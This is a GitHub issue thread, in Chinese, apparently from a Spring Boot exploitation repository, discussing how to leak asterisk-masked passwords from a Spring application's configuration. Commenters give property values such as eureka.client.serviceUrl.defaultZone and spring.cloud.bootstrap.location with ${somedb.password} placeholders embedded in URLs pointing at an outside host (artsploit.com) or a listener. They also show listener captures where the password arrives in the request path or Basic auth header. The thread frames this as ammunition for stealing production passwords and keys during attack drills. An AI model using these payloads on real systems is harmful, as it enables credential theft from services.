Skip to content
New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

获取被星号脱敏的密码的明文 (方法二) 原理/出处 #1

Closed
ghost opened this issue May 27, 2020 · 3 comments
Closed

获取被星号脱敏的密码的明文 (方法二) 原理/出处 #1

ghost opened this issue May 27, 2020 · 3 comments

Comments

@ghost
Copy link

ghost commented May 27, 2020

2020攻防演练弹药库-您有主机上线请注意

就算实在不能RCE, 这里也有个技巧可以偷取 Spring 配置文件中的加密字段, 偷一下生产环境的密码/key也ok

eureka.client.serviceUrl.defaultZone=http://${somedb.password}@127.0.0.1:5000
spring.cloud.bootstrap.location=http://${somedb.password}@artsploit.com/yaml-payload.yml

${somedb.password} 是Spring的占位符, 当发起如下请求时会主动填充, 也就是说所有用以下请求格式的都可以外带, 不限于eureka

scheme://[user:password@]domain:port/path?query_string#fragment_id

【Spring源码分析】.properties文件读取及占位符${...}替换源码解析 - 五月的仓颉 - 博客园

@LandGrey
Copy link
Owner

LandGrey commented May 27, 2020

纠正一下:

  • 出处不是你给的文章里的内容,利用 spring.cloud.bootstrap.location=http://${somedb.password}@artsploit.com/yaml-payload.yml 偷密码跟本不能复现,有理由怀疑根本不行,而作者没有测试或者跟踪源码

  • 你可以跟一下 eureka.client.serviceUrl.defaultZone 偷密码那个流程,结合了 eureka 的认证流程,所以可以外带密码

@ghost
Copy link
Author

ghost commented May 27, 2020

ok, 多谢师傅指正,

spring.cloud.bootstrap.location=http://${somedb.password}@artsploit.com/yaml-payload.yml

这里确实不能在认证头里面带出来密码, 这里会被springboot忽视掉, 但是可以用下面这种

spring.cloud.bootstrap.location=http://127.0.0.1:8888/${somedb.password}.yml

Listening on [0.0.0.0] (family 0, port 8888)
Connection from localhost 1188 received!
HEAD /123456.yml HTTP/1.1
Cache-Control: no-cache
Pragma: no-cache
User-Agent: Java/1.8.0_201
Host: 127.0.0.1:8888
Accept: text/html, image/gif, image/jpeg, *; q=.2, */*; q=.2
Connection: keep-alive

这个
eureka.client.serviceUrl.defaultZone=http://${somedb.password}@127.0.0.1:5000

利用手法也是去年3月份挖Eureka的时候偶然发现的,

总的思想还是从让Spring对占位符进行填充星号字段来实现数据外带,

选择认证头的原因是也是偶然, 当时看到eureka进行访问的url_path/apps/,

以为不可以在url_path传, 也想过http请求出不来的情况, 甚至是dnslog传.

刚才试了一下, 确实也可以在url_path里传递
eureka.client.serviceUrl.defaultZone=http://${somedb.password}@127.0.0.1:5000/123123

Listening on [0.0.0.0] (family 0, port 5000)
Connection from localhost 1319 received!
GET /123123/apps/ HTTP/1.1
Accept: application/json
DiscoveryIdentity-Name: DefaultClient
DiscoveryIdentity-Version: 1.4
DiscoveryIdentity-Id: 192.168.175.1
Accept-Encoding: gzip
Host: 127.0.0.1:5000
Connection: Keep-Alive
User-Agent: Java-EurekaClient/v1.6.2
Authorization: Basic MTIzNDU2Om51bGw=

spring.cloud.bootstrap.location 是我今年写文章的时候看到这的点可以rce, 看到也是HTTP请求,拓展了一下, 没来及测试, 确实不够严谨, 我会在文章里改掉这一点。

@LandGrey
Copy link
Owner

学习了,确实可以从目标发外部 http 请求的过程中,在 url path 中利用占位符带出数据

@ghost ghost closed this as completed May 27, 2020
This issue was closed.
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
Labels
None yet
Projects
None yet
Development

No branches or pull requests

1 participant